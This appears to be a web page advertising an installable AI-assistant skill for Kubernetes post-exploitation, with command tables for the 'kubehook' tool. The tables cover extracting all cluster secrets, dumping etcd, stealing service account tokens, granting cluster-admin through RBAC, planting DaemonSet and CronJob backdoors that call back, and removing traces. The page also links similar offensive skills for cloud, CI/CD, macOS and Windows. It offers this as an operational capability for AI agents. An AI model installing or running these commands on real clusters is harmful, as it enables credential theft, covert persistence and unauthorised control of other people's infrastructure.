メニュー
Kubernetes post-exploitation for container escape, secret extraction, RBAC abuse, and cluster persistence
Codex または Claude でインストール この Prompt をコピーして Codex、Claude、または他のアシスタントに貼り付けると、Skill ページを確認してインストールできます。
SOC 職業分類に基づく
eBPF-based post-exploitation for kernel-level credential harvesting, process hiding, and traffic interception on Linux
AWS post-exploitation for IAM privilege escalation, data exfiltration, persistence, and operational security via boto3
Azure/Entra ID post-exploitation for tenant compromise, Key Vault extraction, managed identity abuse, and token manipulation
CI/CD pipeline attacks for secret extraction, pipeline injection, and supply chain compromise via GitHub/Jenkins/GitLab
macOS post-exploitation for credential harvesting, DTrace monitoring, TCC bypass, and stealth operations via native tools
Windows userland post-exploitation for credential harvesting, monitoring, AMSI/ETW bypass, and stealth operations
| name | k8s-postexploit |
| description | Kubernetes post-exploitation for container escape, secret extraction, RBAC abuse, and cluster persistence |
| category | post-exploitation |
| tags | ["kubernetes","k8s","container","post-exploitation","rbac","escape","etcd","secrets","daemonset","cronjob"] |
| tech_stack | ["kubernetes","python","etcd"] |
| cwe_ids | ["CWE-269","CWE-522","CWE-693","CWE-250"] |
| chains_with | ["T1611","T1552.007","T1613","T1610","T1053.007"] |
| prerequisites | ["T1610","T1078"] |
| version | 1.0 |
Kubernetes post-exploitation targets cluster resources, RBAC misconfigurations, container security boundaries, and etcd for secret extraction. After compromising a pod or obtaining kubeconfig, these tools provide cluster enumeration, privilege escalation, container escape, and persistent access.
pip3 install kubernetes etcd3kubectl auth can-i --list# Quick prerequisite check
kubectl cluster-info # verify cluster access
kubectl auth can-i --list # check current permissions
python3 -c "from kubernetes import client; print('OK')"
| Action | Command | Purpose |
|---|---|---|
| Full enumeration | kubehook k8s_enum | Map namespaces, pods, services, RBAC, ingress |
| Secret metadata | kubehook k8s_enum --namespace kube-system | Focus on high-value system namespace |
| Action | Command | Purpose |
|---|---|---|
| K8s Secrets | kubehook k8s_secrets | Extract and decode all Kubernetes Secrets |
| etcd dump | kubehook etcd_dump --endpoint ENDPOINT | Direct etcd access for all secrets |
| Action | Command | Purpose |
|---|---|---|
| Container escape | kubehook k8s_escape | Detect escape vectors (privileged, hostPID, docker socket) |
| RBAC abuse | kubehook k8s_privesc --method bind_admin | Create ClusterRoleBinding for cluster-admin |
| SA token theft | kubehook k8s_privesc --method sa_token | Steal service account tokens from pods |
| Action | Command | Purpose |
|---|---|---|
| DaemonSet backdoor | kubehook k8s_backdoor --type daemonset --image IMAGE | Deploy on every node |
| CronJob backdoor | kubehook k8s_backdoor --type cronjob --image IMAGE | Periodic callback |
kubehook cleanup_k8s
| Program | Technique | MITRE ATT&CK |
|---|---|---|
| k8s_enum | Cluster resource enumeration | T1613 — Container and Resource Discovery |
| k8s_secrets | Kubernetes Secret extraction | T1552.007 — Container API |
| k8s_escape | Container escape exploitation | T1611 — Escape to Host |
| k8s_privesc | RBAC privilege escalation | T1078 — Valid Accounts |
| etcd_dump | Direct etcd data extraction | T1552.007 — Container API |
| k8s_backdoor | DaemonSet/CronJob persistence | T1053.007 — Container Orchestration Job |
| cleanup_k8s | Resource removal by label selector | T1070 — Indicator Removal |